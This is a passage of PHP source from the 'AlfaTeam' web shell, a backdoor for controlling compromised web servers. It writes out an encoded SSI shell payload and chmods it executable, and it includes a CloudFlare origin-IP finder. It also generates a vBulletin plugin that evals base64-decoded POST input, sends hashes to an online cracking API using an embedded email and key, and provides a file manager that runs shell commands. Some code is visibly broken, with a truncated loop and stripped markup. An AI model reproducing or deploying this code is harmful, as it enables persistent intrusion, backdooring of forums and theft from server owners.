$code = `rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==`;

@__write_file(`alfa_ssi.shtml`,__get_resource($code));

@chmod("alfa_ssi.shtml",0755);

echo AlfaiFrameCreator(`alfa_shtml/alfa_ssi.shtml`);

echo `
`;

alfafooter();

}

function alfacloudflare(){

alfahead();

AlfaNum(8,9,10,7,6,5,4,3);

echo "

| Cloud Flare ByPasser |



Target:
  
";

if($_POST[`alfa2`] && $_POST[`alfa2`] == `>>`){

$url = $_POST[`alfa1`];

if(!preg_match(`/^(https?)://(w{3}|w3)./i`, $url)){

$url = preg_replace(`/^(https?):///`, ``, $url);

$url = "http://www.".$url;

}

$headers = @get_headers($url, 1);

$server = $headers[`Server`];

$subs = array(`owa.`,`2tty.`,`m.`,`gw.`,`mx1.`,`store.`,`1`,`2`,`vb.`,`news.`,`download.`,`video`,`cpanel.`, `ftp.`, `server1.`, `cdn.`, `cdn2.`, `ns.`, `ns3.`, `mail.`, `webmail.`, `direct.`, `direct-connect.`, `record.`, `ssl.`, `dns.`, `help.`, `blog.`, `irc.`, `forum.`, `dl.`, `my.`, `cp.`, `portal.`, `kb.`, `support.`,`search.`, `docs.`, `files.`, `accounts.`, `secure.`, `register.`, `apps.`, `beta.`, `demo.`, `smtp.`, `ns2.`, `ns1.`, `server.`, `shop.`, `host.`, `web.`, `cloud.`, `api.`, `exchange.`, `app.`, `vps.`, `owa.`, `sat.`, `bbs.`, `movie.`, `music.`, `art.`, `fusion.`, `maps.`, `forums.`, `acc.`, `cc.`, `dev.`, `ww42.`, `wiki.`, `clients.`, `client.`,`books.`,`answers.`,`service.`,`groups.`,`images.`,`upload.`,`up.`,`tube.`,`users.`,`admin.`,`administrator.`,`private.`,`design.`,`whmcs.`,`wp.`,`wordpress.`,`joomla.`,`vbulletin.`,`test.`,`developer.`,`panel.`,`contact.`);

if(preg_match(`/^(https?)://(w{3}|w3)./i`, $url, $matches)){

if($matches[2] != `www`){$url = preg_replace(`/^(https?):///`, ``, $url);}else{

$url = explode($matches[0], $url);

$url = $url[1];}}

if(is_array($server))$server = $server[0];

echo __pre();

if(preg_match(`/cloudflare/i`, $server))

echo "
[+] CloudFlare detected: {$server}

";

else

echo "
[+] CloudFlare wasn`t detected, proceeding anyway.
";

echo `[+] CloudFlare IP: ` . is_ipv4(gethostbyname($url)) . "



";

echo "[+] Searching for more IP addresses.



";

for($x=0;$x
$site = $subs[$x] . $url;

$ip = is_ipv4(gethostbyname($site));

if($ip == `(Null)`)

continue;

echo "Trying {$site}: {$ip}

";

}

echo "
[+] Finished.

";

}

echo `
`;

alfafooter();

}

function is_ipv4($ip){

return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : `(Null)`;

}

function __alert($s){

echo ``.__pre().$s.``;

}

function create_table($data){

echo ``;

foreach ($data as $key => $val){

$array = array();

foreach($val as $k => $v){

$array[$k] = $v;

}

echo "";

}

echo `
".$array[`tdName`]."
`;

}

function alfaphp2xml(){

alfahead();

AlfaNum(8,9,10,7,6,5,4,3);

echo "
| Shell For vBulletin |







";

if($_POST[`alfa2`]&&$_POST[`alfa2`]==`>>`){

echo __pre()."
";<br />
echo `<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[`PHP_SELF`],"subscriptions.php")){eval(base64_decode(``.__ZW5jb2Rlcg($_POST[`alfa1`]).``));exit;}]]></phpcode></plugin></plugins>`;<br />
echo `
`;

}

echo `
`;

alfafooter();

}

function alfacpcrack(){

alfahead();

echo `
| Hash Tools |
| DeCrypter | | Hash Analyzer | `;

if($_POST[`alfa1`]==`dec`){

$algorithms = array(`md5`=>`MD5`,`md4`=>`MD4`,`sha1`=>`SHA1`,`sha256`=>`SHA256`,`sha384`=>`SHA384`,`sha512`=>`SHA512`,`ntlm`=>`NTLM`);

echo `
| DeCrypter |




Decrypt Method:
 `;

foreach($algorithms as $key=>$val){echo(``.$val.``);}

echo` 
`;

if($_POST[`alfa3`] == `>>`){

$hash = $_POST[`alfa2`];

if(!empty($hash)){

$hash_type = $_POST[`alfa4`];

$email = "solevisible@gmail.com";

$code = "7b9fa79f92c3cd96";

$target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;

$resp = @file_get_contents($target);

if($resp==``){

$get = new AlfaCURL();

$resp = $get->Send($target);

}

echo __pre().``;

switch($resp){

    case(`CODE ERREUR : 001`):echo "You exceeded the 400 allowed request per day";break;

    case(`CODE ERREUR : 003`):echo "Your request includes more than 400 hashes.";break;

    case(`CODE ERREUR : 004`):echo "The type of hash you provide in the argument hash_type doesn`t seem to be valid";break;

    case(`CODE ERREUR : 005`):echo "The hash you provide doesn`t seem to match with the type of hash you set.";break;

}

if(substr($resp,0,4)!=`CODE`&&$resp!=``){

echo "Result: ".$resp."";

}elseif(substr($resp,0,4)!=`CODE`){

echo "NoT Found
";

}

echo(``);

}

}

}

if($_POST[`alfa1`]==`analyzer`){

echo `
| Hash Analyzer |




Hash: 
  
`;

if($_POST[`alfa3`] == `>>`){

$hash = $_POST[`alfa2`];

if(!empty($hash)){

$curl = new AlfaCURL();

$resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");

echo(__pre().``);

if(preg_match(`#
(.*?)
#`,$resp,$s)){

    echo(``.$s[1].``);

}else{

    echo(`Not Found...!`);

}

echo(`
`);

}

}

}

echo `
`;

alfafooter();

}

function alfafooter(){

if(!isset($_POST[`ajax`])){

echo "


















Make File : 
 
Make Dir : 
 
Delete : 
 
Chmod : 
 


Change Dir : 
 
Read File : 
 


Execute :
 












Upload file: +
 &nbsp;&nbsp;Choose a file

[ ./AlfaTeam &copy; 2012-".date(`Y`)." ]







Clear all
History




Show Editor


Show Cgi








";

}}

if (!function_exists("posix_getpwuid") && (strpos(@ini_get(`disable_functions`), `posix_getpwuid`)===false)) {

function posix_getpwuid($p) {return false;} }

if (!function_exists("posix_getgrgid") && (strpos(@ini_get(`disable_functions`), `posix_getgrgid`)===false)) {

function posix_getgrgid($p) {return false;} }

function alfaWhich($p) {

$path = alfaEx(`which ` . $p,false,false);

if(!empty($path))

return strlen($path);

return false;

}

function alfaSize($s) {

if($s >= 1073741824)

return sprintf(`%1.2f`, $s / 1073741824 ). ` GB`;

elseif($s >= 1048576)

return sprintf(`%1.2f`, $s / 1048576 ) . ` MB`;

elseif($s >= 1024)

return sprintf(`%1.2f`, $s / 1024 ) . ` KB`;

else

return $s . ` B`;

}

function alfaPerms($p) {

if (($p & 0xC000) == 0xC000)$i = `s`;

elseif (($p & 0xA000) == 0xA000)$i = `l`;

elseif (($p & 0x8000) == 0x8000)$i = `-`;

elseif (($p & 0x6000) == 0x6000)$i = `b`;

elseif (($p & 0x4000) == 0x4000)$i = `d`;

elseif (($p & 0x2000) == 0x2000)$i = `c`;

elseif (($p & 0x1000) == 0x1000)$i = `p`;

else $i = `u`;

$i .= (($p & 0x0100) ? `r` : `-`);

$i .= (($p & 0x0080) ? `w` : `-`);

$i .= (($p & 0x0040) ? (($p & 0x0800) ? `s` : `x` ) : (($p & 0x0800) ? `S` : `-`));

$i .= (($p & 0x0020) ? `r` : `-`);

$i .= (($p & 0x0010) ? `w` : `-`);

$i .= (($p & 0x0008) ? (($p & 0x0400) ? `s` : `x` ) : (($p & 0x0400) ? `S` : `-`));

$i .= (($p & 0x0004) ? `r` : `-`);

$i .= (($p & 0x0002) ? `w` : `-`);

$i .= (($p & 0x0001) ? (($p & 0x0200) ? `t` : `x` ) : (($p & 0x0200) ? `T` : `-`));

return $i;

}

function alfaPermsColor($f,$isbash=false){

$class = "";

$num = "";

$human = "";

if($isbash){

$class = $f["class"];

$num = $f["num"];

$human = $f["human"];

}else{

$num = substr(sprintf(`%o`, @fileperms($f)),-4);

$human = alfaPerms(@fileperms($f));

if(!@is_readable($f))

$class = "main_red_perm";

elseif (!@is_writable($f))

$class = "main_white_perm";

else

$class = "main_green_perm";

}

return ``.$num.` >> `.$human.``;

}

if(!function_exists("scandir")) {

function scandir($dir) {

$dh = opendir($dir);

while (false !== ($filename = readdir($dh)))

$files[] = $filename;

return $files;

}

}

function reArrayFiles($file_post){

$file_ary = array();

$file_count = count($file_post[`name`]);

$file_keys = array_keys($file_post);

for ($i=0; $i<$file_count; $i++) {

foreach ($file_keys as $key) {

$file_ary[$i][$key] = $file_post[$key][$i];

}

}

return $file_ary;

}

function _alfa_can_runCommand($cgi=true,$cache=true){

    if(isset($_SESSION["alfa_canruncmd"])&&$cache){

        return true;

    }

    if(strlen(alfaEx("whoami",false,$cgi))>0){

        $_SESSION["alfa_canruncmd"] = true;

        return true;

    }

    return false;

}

function _alfa_symlink($target, $link){

    $phpsym = function_exists("symlink");

    if($phpsym){

        @symlink($target, $link);

    }else{

        alfaEx("ln -s `".addslashes($target)."` `".addslashes($link)."`");

    }

}

function _alfa_file_exists($file,$cgi=true){

    if(@file_exists($file)){

        return true;

    }else{

        if(strlen(alfaEx("ls -la `".addslashes($file)."`",false,$cgi))>0){

            return true;

        }

    }

    return false;

}

function _alfa_file($file,$cgi=true){

    $array = @file($file);

    if(!$array){

        if(strlen(alfaEx("id",false,$cgi))>0){

            $data = alfaEx(`cat "`.addslashes($file).`"`,false,$cgi);

            if(strlen($data)>0){

                return explode("
", $data);

            }else{

                return false;

            }

        }else{

            return false;

        }

    }else{

        return $array;

    }

}

function _alfa_is_writable($file){

    $check = false;

    $check = @is_writable($file);

    if(!$check){

        if(_alfa_can_runCommand()){

            $check = alfaEx(`[ -w "`.trim(addslashes($file)).`" ] && echo "yes" || echo "no"`);

            if($check == "yes"){

                $check = true;

            }else{

                $check = false;

            }

        }

    }

    return $check;

}

function _alfa_is_dir($dir,$mode="-d"){

    $check = false;

    $check = @is_dir($dir);

    if(!$check){

        if(_alfa_can_runCommand()){

            $check = alfaEx(`[ "`.trim($mode).`" "`.trim(addslashes($dir)).`" ] && echo "yes" || echo "no"`);

            if($check == "yes"){

                return true;

            }else{

                return false;

            }

        }

    }

    return $check;

}

function alfaFilesMan(){

alfahead();

AlfaNum(8,9,10,7,6,5,4);

echo `
`;

if(!empty ($_COOKIE[`f`]))

$_COOKIE[`f`] = @unserialize($_COOKIE[`f`]);

if(!empty($_POST[`alfa1`])){

switch($_POST[`alfa1`]){

case `uploadFile`:

if(isset($GLOBALS[`glob_chdir_false`])){

    $alfa_canruncmd = _alfa_can_runCommand(true,true);

    $move_cmd_file = true;

}

$files = reArrayFiles($_FILES[`f`]);

foreach($files as $file){

if($move_cmd_file){

    alfaEx("cat `".addslashes($file[`tmp_name`])."` > `".addslashes($_POST["c"]."/".$file[`name`])."`");

}else{

    @move_uploaded_file($file[`tmp_name`],$file[`name`]);

}

echo "uped...!
";

}

break;

case `mkdir`:

$new_dir_cmd = false;

if(isset($GLOBALS[`glob_chdir_false`])){

    if(_alfa_can_runCommand(true,true)){

        alfaEx("cd `".trim(addslashes($_POST[`c`]))."`;mkdir `".trim(addslashes($_POST[`alfa2`]))."`");

    }

}else{

if(!@mkdir(trim($_POST[`alfa2`])))

echo "Can`t create new dir !";

}

break;

case `delete`:

function deleteDir($path){

$path = (substr($path,-1)==`/`) ? $path:$path.`/`;

$dh = @opendir($path);

while(($item = @readdir($dh)) !== false){

$item = $path.$item;

if((basename($item) == "..") || (basename($item) == "."))

continue;

$type = @filetype($item);

if ($type == "dir")

deleteDir($item);

else

@unlink($item);

}

@closedir($dh);

@rmdir($path);

}

if(is_array(@$_POST[`f`]))

foreach($_POST[`f`] as $f){

if($f == `..`)

continue;

$f = rawurldecode($f);

if(isset($GLOBALS["glob_chdir_false"])){

    if(_alfa_can_runCommand(true,true)){

        alfaEx("rm -rf `".addslashes($_POST[`c`].`/`.$f)."`");

    }

}else{

alfaEx("rm -rf `".addslashes($f)."`",false,false);

if(@is_dir($f))

deleteDir($f);

else

@unlink($f);

}

}

if(@is_dir(rawurldecode(@$_POST[`alfa2`]))&&rawurldecode(@$_POST[`alfa2`])!=`..`){

deleteDir(rawurldecode(@$_POST[`alfa2`]));

alfaEx("rm -rf `".addslashes($_POST[`alfa2`])."`",false,false);

}else{

@unlink(rawurldecode(@$_POST[`alfa2`]));

}

if(isset($GLOBALS["glob_chdir_false"])){

    $source = rawurldecode(@$_POST[`alfa2`]);

    if($source!=`..`&&!empty($source)){

        if(_alfa_can_runCommand(true,true)){

            alfaEx("cd `".trim(addslashes($_POST[`c`]))."`;rm -rf `".addslashes($source)."`");

        }

    }

}

break;

case `paste`:

if($_SESSION[`act`] == `copy`&&isset($_SESSION[`f`])){

function copy_paste($c,$s,$d){

if(@is_dir($c.$s)){

@mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if (($f != ".") and ($f != ".."))

copy_paste($c.$s.`/`,$f, $d.$s.`/`);

} elseif(is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_SESSION[`f`] as $f)

copy_paste($_SESSION[`c`],$f, $GLOBALS[`cwd`]);

}elseif($_SESSION[`act`] == `move`&&isset($_SESSION[`f`])){

function move_paste($c,$s,$d){

if(@is_dir($c.$s)){

@mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if(($f != ".") and ($f != ".."))

copy_paste($c.$s.`/`,$f, $d.$s.`/`);

}elseif(@is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_SESSION[`f`] as $f)

@rename($_SESSION[`c`].$f, $GLOBALS[`cwd`].$f);

}elseif($_SESSION[`act`] == `zip`&&isset($_SESSION[`f`])){

if(class_exists(`ZipArchive`)){

$zip = new ZipArchive();

$zipX = "alfa_".rand(1,1000).".zip";

if($zip->open($zipX, 1)){

@chdir($_SESSION[`c`]);

foreach($_SESSION[`f`] as $f){

if($f == `..`)continue;

if(@is_file($_SESSION[`c`].$f))

$zip->addFile($_SESSION[`c`].$f, $f);

elseif(@is_dir($_SESSION[`c`].$f)){

$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.`/`));

foreach($iterator as $key=>$value){

$key = str_replace(`\`,`/`,realpath($key));

if(@is_dir($key)){

if(in_array(substr($key, strrpos($key,`/`)+1),array(`.`, `..`)))continue;

}else{$zip->addFile($key,$key);}}}}

@chdir($GLOBALS[`cwd`]);

$zip->close();

__alert(`>> `.$zipX.` << is created...`);}}

}elseif($_SESSION[`act`] == `unzip`&&isset($_SESSION[`f`])){

if(class_exists(`ZipArchive`)){

$zip = new ZipArchive();

foreach($_SESSION[`f`] as $f) {

if($zip->open($_SESSION[`c`].$f)){

$zip->extractTo($GLOBALS[`cwd`]);

$zip->close();}}}}

unset($_SESSION[`f`]);

break;

default:

if(!empty($_POST[`alfa1`])){

$_SESSION[`act`] = @$_POST[`alfa1`];

$_SESSION[`f`] = @$_POST[`f`];

$_SESSION[`c`] = @$_POST[`c`];

}

break;

}

}

if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST[`c`]) && $_SESSION[__LAST_CWD__] != ``){

    $dirContent = @scandir($_SESSION[__LAST_CWD__]);

}else{

    $dirContent = @scandir(isset($_POST[`c`])?$_POST[`c`]:$GLOBALS[`cwd`]);

    if(preg_match("#(.*)/..#", $_POST[`c`], $res)){

        $path = explode(`/`, $res[1]);

        array_pop($path);

        $_POST[`c`] = implode(`/`, $path);

    }

    $_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST[`c`]);

}

$cmd_dir = false;

if($dirContent === false){

    if(_alfa_can_runCommand(true,true)){

        @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));

        if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){

            $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";

            alfaWriteTocgiapi("getdir.alfa",$bash);

        }

        if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";

        $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa `".addslashes($_SESSION[__LAST_CWD__])."`");

        $dirContent = json_decode($dirContent, true);

        if(is_array($dirContent)){

            array_pop($dirContent);

            $cmd_dir = true;

        }else{

            $dirContent = false;

        }

        $_SESSION["alfachdir_bash"] = true;

    }

}

if($dirContent == false){

echo `
!!! Access Denied !!!

`;

alfaFooter();

return;

}

global $sort;

$sort = array(`name`, 1);

if(!empty($_POST[`alfa1`])) {

if(preg_match(`!s_([A-z]+)_(d{1})!`, $_POST[`alfa1`], $match))

$sort = array($match[1], (int)$match[2]);

}

echo "
";

$dirs = $files = array();

$n = count($dirContent);

for($i=0;$i<$n;$i++){

if($cmd_dir){

$filename = $dirContent[$i]["name"];

$file_owner = $dirContent[$i]["owner"];

$file_group = $dirContent[$i]["group"];

$file_modify = @date(`Y-m-d H:i:s`, $dirContent[$i]["modify"]);

$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);

$file_size = $dirContent[$i]["size"];

$file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];

}else{

$filename = $dirContent[$i];

$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS[`cwd`].$filename)):array("name" => "????");

$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS[`cwd`].$filename)):array("name" => "????");

$file_owner = $ow[`name`]?$ow[`name`]:(function_exists("fileowner")?@fileowner($GLOBALS[`cwd`].$filename):"????");

$file_group = $gr[`name`]?$gr[`name`]:(function_exists("filegroup")?@filegroup($GLOBALS[`cwd`].$filename):"????");

$file_modify = @date(`Y-m-d H:i:s`, @filemtime($GLOBALS[`cwd`] . $filename));

$file_perm = alfaPermsColor($GLOBALS[`cwd`].$filename);

$file_size = @filesize($GLOBALS[`cwd`].$filename);

$file_path = $GLOBALS[`cwd`].$filename;

}

$tmp = array(`name` => $filename,

`path` => $file_path,

`modify` => $file_modify,

`perms` => $file_perm,

`size` => $file_size,

`owner` => $file_owner,

`group` => $file_group

);

if(!$cmd_dir){

if(@is_file($file_path))

$files[] = array_merge($tmp, array(`type` => `file`));

elseif(@is_link($file_path))

$dirs[] = array_merge($tmp, array(`type` => `link`, `link` => readlink($tmp[`path`])));

elseif(@is_dir($file_path)&& ($filename != "."))

$dirs[] = array_merge($tmp, array(`type` => `dir`));

}else{

    if($dirContent[$i]["type"]=="file"){

        $files[] = array_merge($tmp, array(`type` => `file`));

    }else{

        if($dirContent[$i]["name"] != "."){

            $dirs[] = array_merge($tmp, array(`type` => `dir`));

        }

    }

}

}

$GLOBALS[`sort`] = $sort;

function alfaCmp($a, $b) {

if($GLOBALS[`sort`][0] != `size`)

return strcmp(strtolower($a[$GLOBALS[`sort`][0]]), strtolower($b[$GLOBALS[`sort`][0]]))*($GLOBALS[`sort`][1]?1:-1);

else

return (($a[`size`] < $b[`size`]) ? -1 : 1)*($GLOBALS[`sort`][1]?1:-1);

}

usort($files, "alfaCmp");

usort($dirs, "alfaCmp");

$files = array_merge($dirs, $files);

$l=0;

$cc=0;

foreach($files as $f){

$f[`name`] = htmlspecialchars($f[`name`]);

$newname = mb_strlen($f[`name`], `UTF-8`)>60?mb_substr($f[`name`], 0, 60, `utf-8`).`...`:$f[`name`];

$checkbox = `checkbox`.$cc;

$raw_name = rawurlencode($f[`name`]);

$icon = $GLOBALS[`DB_NAME`][`show_icons`]?``:``;

$style = $GLOBALS[`DB_NAME`][`show_icons`]?`position:relative;display:inline-block;bottom:12px;`:``;

echo ``;

$l = $l?0:1;

$cc++;

}

echo "
Name
Size
Modify
Owner/Group
Permissions
Actions
`.$icon.`
`.($GLOBALS[`cwd`].$f[`name`]==$GLOBALS[`__file_path`]?"".$f[`name`]."":htmlspecialchars($newname)):`g(`FilesMan`,``.$f[`path`].``);" title=` . $f[`link`] . `>| ` . htmlspecialchars($f[`name`]) . ` |`).`
`.(($f[`type`]==`file`)?alfaSize($f[`size`]):$f[`type`]).`
`.$f[`modify`].`
`.$f[`owner`].`/`.$f[`group`].`
`.

$f[`perms`].`
R T`.(($f[`type`]==`file`)?` E D`:``).` X 








CopyMoveDeleteAdd 2 Compress (zip)Add 2 Uncompress (zip)Paste / Zip / Unzip 



";

alfafooter();

}

function alfaFilesTools(){

alfahead();

echo `
`;

if(isset($_POST[`alfa1`]))$_POST[`alfa1`] = rawurldecode($_POST[`alfa1`]);

$alfa1_decoded = $_POST[`alfa1`];

$chdir_fals = false;

if(!@chdir($_POST[`c`])){

    $chdir_fals = true;

    $_POST[`alfa1`] = $_POST["c"]."/".$_POST["alfa1"];

    $alfa_canruncmd = _alfa_can_runCommand(true,true);

    if($alfa_canruncmd){

        $slashed_alfa1 = addslashes($_POST[`alfa1`]);

        $file_info = explode(":", alfaEx(`stat -c "%F:%U:%G:%s:%Y:0%a:%A" "`.$slashed_alfa1.`"`));

        $perm_color_class = alfaEx("if [[ -w `".$slashed_alfa1."` ]]; then echo main_green_perm; elif [[ -r `".$slashed_alfa1."` ]]; then echo main_white_perm; else echo main_red_perm; fi");

    }

}

if($_POST[`alfa2`] == `auto`){

if(is_array(@getimagesize($_POST[`alfa1`]))){

$_POST[`alfa2`] = `image`;

}else{

    $_POST[`alfa2`] = `view`;

    if($chdir_fals){

        if($alfa_canruncmd){

            $mime = explode(":", alfaEx("file --mime-type `".addslashes($_POST[`alfa1`])."`"));

            $mimetype = $mime[1];

            if(!empty($mimetype)){

                if(strstr($mimetype, "image")){

                    $_POST[`alfa2`] = `image`;

                }

            }

        }

    }

}

}

if($_POST[`alfa2`] == "rename" && !empty($_POST[`alfa3`]) && @is_writable($_POST[`alfa1`])){$rename_cache = $_POST[`alfa3`];}

if(@$_POST[`alfa2`] == `mkfile`){

$_POST[`alfa1`] = trim($_POST[`alfa1`]);

if($chdir_fals&&$alfa_canruncmd){

    if(_alfa_is_writable($_POST["c"])){

        alfaEx("cd `".addslashes($_POST["c"])."`;touch `".addslashes($alfa1_decoded)."`");

        $_POST[`alfa2`] = "edit";

    }

}

if(!@file_exists($_POST[`alfa1`])){

$fp = @fopen($_POST[`alfa1`], `w`);

if($fp){

$_POST[`alfa2`] = "edit";

fclose($fp);

}

}else{

$_POST[`alfa2`] = "edit";

}

}

if(!_alfa_file_exists(@$_POST[`alfa1`])){

echo __pre()."
!...FILE DOEST NOT EXITS...!
";

alfaFooter();

return;

}

if($chdir_fals){

$filesize = $file_info[3];

$uid["name"] = $file_info[1];

$gid["name"] = $file_info[2];

$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);

}else{

$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST[`alfa1`])):``;

$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST[`alfa1`])):``;

if(!$uid&&!$gid){

$uid[`name`] = function_exists("fileowner")?@fileowner($_POST[`alfa1`]):``;

$gid[`name`] = function_exists("filegroup")?@filegroup($_POST[`alfa1`]):``;

}

$permcolor = alfaPermsColor($_POST[`alfa1`]);

$filesize = @filesize($_POST[`alfa1`]);

if(!isset($uid[`name`],$gid[`name`])||empty($uid[`name`])||empty($gid[`name`])){

    if(_alfa_can_runCommand()){

        list($uid[`name`],$gid[`name`]) = explode(":", alfaEx(`stat -c "%U:%G" "`.addslashes($_POST["c"]."/".$_POST["alfa1"]).`"`));

    }

}

}

echo `Name: `.htmlspecialchars($alfa1_decoded).` Size: `.alfaSize($filesize).` Permission: `.$permcolor.` Owner/Group: `.$uid[`name`].`/`.$gid[`name`].` Directory: `.str_replace("//", "/",($chdir_fals?"":$_POST[`c`].`/`).$_POST[`alfa1`]).`

`;

if(empty($_POST[`alfa2`]))$_POST[`alfa2`] = `view`;

if(!_alfa_is_dir($_POST[`alfa1`])){

$m = array(`View`, `Edit`, `Download`, `Highlight`, `Chmod`, `Rename`, `Touch`, `Delete`, `Image`, `Hexdump`);

$ftype = "file";

}else{

$m = array(`Chmod`, `Rename`, `Touch`);

$ftype = "dir";

}

foreach($m as $v)

echo $v == `Delete` ? ``.((strtolower($v)==@$_POST[`alfa2`])?` `.$v.`  `:$v).` |  ` : ``.((strtolower($v)==@$_POST[`alfa2`])?` `.$v.`  `:$v).` | `;

echo `

`;

switch($_POST[`alfa2`]){

case `view`:

@chdir($_POST[`c`]);

echo `
copy to clipboard
`;

echo htmlspecialchars(__read_file($_POST[`alfa1`]));

echo `
`;

break;

case `highlight`:

@chdir($_POST[`c`]);

if(@is_readable($_POST[`alfa1`])){

echo `
`;

$code = @highlight_file($_POST[`alfa1`],true);

echo str_replace(array(``), array(``),$code).`
`;

}

break;

case `delete`:

@chdir($_POST[`c`]);

if(@is_writable($_POST[`alfa1`])||isset($GLOBALS["glob_chdir_false"])){

$deleted = true;

if(!@unlink($_POST[`alfa1`])){

    $deleted = false;

    if($alfa_canruncmd){

        if(_alfa_is_writable($_POST[`alfa1`])){

            alfaEx("rm -f `".addslashes($_POST[`alfa1`])."`");

            $deleted = true;

        }

    }

}

if($deleted)echo `File Deleted...`;else echo `Error...`;}

break;

case `chmod`:

@chdir($_POST[`c`]);

if(!empty($_POST[`alfa3`])){

$perms = 0;

for($i=strlen($_POST[`alfa3`])-1;$i>=0;--$i)

$perms += (int)$_POST[`alfa3`][$i]*pow(8, (strlen($_POST[`alfa3`])-$i-1));

if(!@chmod($_POST[`alfa1`], $perms)){

if($chdir_fals&&$alfa_canruncmd){

alfaEx("cd `".addslashes($_POST["c"])."`;chmod ".addslashes($_POST[`alfa3`])." `".addslashes($alfa1_decoded)."`");

echo(`Success!`);

}else{

echo `Can`t set permissions!
`;}

}else{echo(`Success!`);}

}

clearstatcache();

AlfaNum(8,9,10,7,6,5,4,2,1);

if($chdir_fals){

    $file_perm = $file_info[5];

}else{

